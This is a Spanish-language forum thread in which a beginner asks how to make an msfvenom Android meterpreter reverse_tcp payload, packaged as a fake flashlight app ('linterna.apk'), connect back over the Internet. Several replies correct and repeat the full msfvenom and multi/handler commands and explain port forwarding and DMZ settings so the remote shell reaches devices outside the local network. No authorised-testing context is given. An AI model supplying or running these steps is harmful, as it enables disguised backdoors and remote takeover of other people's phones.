Foro de elhacker.net

Seguridad Informática => Bugs y Exploits => Mensaje iniciado por: GreenTick en 16 Junio 2016, 17:36 pm



Título: DUDA: Colocar IP Publica en exploit de reverse_tcp (MSFVENOM)
Publicado por: GreenTick en 16 Junio 2016, 17:36 pm
Hola a todos. Como he dicho en otro tema, y vuelvo a repetir  :rolleyes: estoy comenzando en esto de la seguridad informatica y soy muy principiante.  el caso es que he estado probando por primeravez esto de los exploits, y me ha surgido una duda. He estado probando un exploit y hay que colocar una IP y un PUERTO. La ayuda que he visto en internet, indica que colocan la IP local, no obstante, me surgio la duda, busque por internet, y me parecio leer que con la IP Publica tambien funciona, y asi puedes ejecutar el exploit en un dispositivo que no este en tu red local.
No obstante, he estado probando y no me ha funcionado. Me gustaria que alguien me respondiese si esto es posible, y tanto si lo es como si no, el por que (Nunca olvidemos que la base es el aprendizaje)

Os dejo los comandos del exploit para que me podais ayudar con mas facilidad. gracias.

Citar
msfvenom –p android/meterpreter/reverse_tcp LHOST=192.168.1.50 LPORT=4444 R > /root/linterna.apk

msfconsole

msf  > use multi/handler
msf exploit(handler) > set payload android/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.0.110
msf exploit(handler) > set LPORT 4444
msf exploit(handler) > exploit


Título: Re: DUDA: Colocar IP Publica en exploit de reverse_tcp (MSFVENOM)
Publicado por: eag1eO9 en 16 Junio 2016, 17:44 pm
reverse_tcp_dns

https://www.rapid7.com/db/modules/payload/windows/meterpreter/reverse_tcp_dns (https://www.rapid7.com/db/modules/payload/windows/meterpreter/reverse_tcp_dns)

 :o


eag1eO9

MOD EDIT: No hacer doble post.


Título: Re: DUDA: Colocar IP Publica en exploit de reverse_tcp (MSFVENOM)
Publicado por: windic en 16 Junio 2016, 18:26 pm
Primero decirte que te vendría bien buscar algún libro de redes de computadores o sobre IPv4.

IP publica --------------> rango de direcciones IPs asignadas por los ISP cuando se contrata un adsl. Este rango de direcciones son administradas por la IANA. Son direcciones únicas en todo el rango de Internet.

IP privada --------------> rango de direcciones IPs asignados a equipos en una red privada por convención son los rangos 10.0.0.0/8 , 172.16.0.0/12 , 192.168.0.0/16. (esta convención esta desfasada por lo que puedes usar cualquier dirección)

Por otra parte has de saber que para cualquier programa la importancia de si la IP usada es la publica o la privada es nula, ya que los programas no distinguen entre unos tipos de IPs (si distinguen entre IPv4 e IPv6) y otros. El único al que le importa esto es a la arquitectura de tu red. Por lo tanto abría que ver que red usas para conectarte a Internet.

Suponiendo que tu red es la típica con un router el cual tiene asignada una IP publica y una privada y hace la conversión mediante NAT. Entonces Deberás abrir los puertos de tu router haciendo un PAT a la dirección privada de tu ordenador y también deberás poner tu dirección privada en el DMZ del router.
Código:
msfvenom –p android/meterpreter/reverse_tcp LHOST=(*tu ip privada o publica) LPORT=(port)R > /root/linterna.apk 

msfconsole

use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set LHOST (tu ip privada)
set LPORT (port)
exploit


*Usar tu ip privada para redes local, usar tu ip publica para funcionar a través de Internet


Título: Re: DUDA: Colocar IP Publica en exploit de reverse_tcp (MSFVENOM)
Publicado por: reyo en 23 Junio 2016, 03:35 am
hola amigo muy buenas comprendo que seas principiante y por eso te ayudare ; )
ya que yo tambien se lo basico pero te explicare absolutamente TODO muy bien resumido y sin muchas complicaciones ;D

En primer lugar copiare tu codigo y lo restificare paso a paso:

msfvenom –p android/meterpreter/reverse_tcp LHOST=192.168.1.50 LPORT=4444 R > /root/linterna.apk

msfconsole

msf  > use multi/handler
msf exploit(handler) > set payload android/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.0.110
msf exploit(handler) > set LPORT 4444
msf exploit(handler) > exploit


Lo que te resalte esta mal la primera escribiste mal la direccion ip de LHOST y asi no podra conectar, en segundo esa ruta es segun tu sistema yo e visto el video de donde la sacaste y ami esa ruta no me vale asi que pon tu una ruta de donde quieres ubicar el apk y por tercero y ultimo lugar es un consejo ;)
si lo llegas a usar en ip publica recuerda que tienes que activar los respectivos puertos en el router.
un saludo y espero que te haya ayudado.
EL MEJOR MAESTRO FUE DISCIPULO Y SI SOMOS DISCIPULOS LlEgArEmOs hA MaEsTrOs